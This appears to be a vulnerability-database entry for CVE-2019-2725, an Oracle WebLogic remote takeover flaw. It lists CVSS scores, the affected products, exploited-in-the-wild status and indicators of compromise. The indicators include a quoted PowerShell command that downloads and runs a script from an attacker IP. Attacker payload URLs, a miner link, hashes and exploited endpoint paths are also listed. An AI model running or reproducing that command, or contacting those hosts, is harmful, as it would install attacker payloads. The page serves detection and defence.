cbcvebase.
CVE-2019-2725
published 2019-04-26

CVE-2019-2725: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are…

PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-07-10
Exploited in the wild
EPSS
99.96%
100.0th percentile
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Affected

19 ranges
VendorProductVersion rangeFixed in
oracleagile_plm
oracleagile_plm
oracleagile_plm
oraclecommunications_converged_application_server
oraclecommunications_converged_application_server
oraclecommunications_converged_application_server
oraclepeoplesoft_enterprise_peopletools
oraclepeoplesoft_enterprise_peopletools
oraclepeoplesoft_enterprise_peopletools
oraclestoragetek_tape_analytics_sw_tool
oracletape_library_acsls
oracletape_virtual_storage_manager_gui
oraclevm_virtualbox< 5.2.365.2.36
oraclevm_virtualbox
oraclevm_virtualbox>= 6.0.0 < 6.0.166.0.16
oraclevm_virtualbox>= 6.1.0 < 6.1.26.1.2
oracleweblogic_server
oracleweblogic_server
oracle_corporationtape_library_acsls

Detection & IOCsextracted from sources · hover to see the quote

commandiex(New-ObjectNet.WebClient).DownloadString('hxxp://139.180.199.167:1012/update[.]ps1')
ip45.32.28.187
ip139.180.199.167
urlhxxp://45.32.28.187:1012/cert.cer
urlhxxp://139.180.199.167:1012/clean.bat
urlhxxp://139.180.199.167:1012/config.json
urlhxxp://139.180.199.167:1012/networkservice.exe
urlhxxp://139.180.199.167:1012/sysguard.exe
urlhxxp://139.180.199.167:1012/sysupdate.exe
urlhxxp://139.180.199.167:1012/update.ps1
hashe4bc026aec8a76b887a8fc48726b9c48540fc2aa76eb8e61893da2ee6df6ab3a
hash4b9842b6be35665174c78c3e4063c645bd6e10eb333f68e4c7840fe823647bdf
hashc30f42e6f638f3e8218caf73c2190d2a521304431994fd6efeef523cfbaa5e81
hash3a567b7985b2da76db5e5a1d5554f7c13f375d88a27d6e6d108ad79e797adc9a
filenamecert.cer
filenameupdate.ps1
ip188.166.74.218
ip45.55.211.79
ip130.61.54.136
urlhxxp://188.166.74.218/office.exe
urlhxxp://188.166.74.218/radm.exe
urlhxxp://188.166.74.218/untitled.exe
urlhxxp://45.55.211.79/.cache/untitled.exe
domaindecryptor.top
hash0fa207940ea53e2b54a2b769d8ab033a6b2c5e08c78bf4d7dade79849960b54d
hash34dffdb04ca07b014cdaee857690f86e490050335291ccc84c94994fa91e0160
hash74bc2f9a81ad2cc609b7730dbabb146506f58244e5e655cbb42044913384a6ac
hash95ac3903127b74f8e4d73d987f5e3736f5bdd909ba756260e187b6bf53fb1a05
hashfa2bccdb9db2583c2f9ff6a536e824f4311c9a8a9842505a0323f027b8b51451
hash871f38fd4299b4d94731745d8b33ae303dcb9eaa
ip89.34.27.167
ip79.110.62.23
ip51.79.175.139
ip198.23.214.117
domainoracleservice.top
domainletmaker.top
domainpwndns.pw
urlhttps://cdn.discordapp.com/attachments/994652587494232125/1004395450058678432/miner_Nyrpcmbw.png
hashee6787636ea66f0ecea9fa2a88f800da806c3ea6
hash833cbeb0e748860f41b4f0192502b817a09eff6a
hash165f188b915b270d17f0c8b5614e8b289d2a36e2
hash528477d0a2cf55f6e4899f99151a39883721b722
hash557d729f8a7ba712a48885304280b564194406d3
hash58af7af0dbf079bafd8fae1a7b3a2230b2bcba31
hash740a1cdee7b7f4350eec53c1ca3022562ea83903
hash7477812278038e8d3606c433f1c4389b897012e2
hash75ea4b0b76a0b61bd0f8f4a491e5db918bc1df1c
hash7b128cd6cf092409fc9c71ddd27c66dd98002b1a
hash9bc4db76ae77ea98fdcaa9000829840d33faba97
hashbe53175a3b3e11c1e3ca7b87abb6851479453272
hashc1630af40f38f01e94eec2981c5f4f11481ba700
hashc22f9ae02601a52c9dca91c3b4cb3d2221f54b50
hashc537cf320e90a39e7f5e9846e118502802752780
hashc86349460658a994e517fede6773e650f8f3ac9b
hashd5138d1708d5d77ea86920a217c2033a2e94ad7e
path/_async/*
path/wls-wsat/*
path/public/hydra.php

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_oracle7.5CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.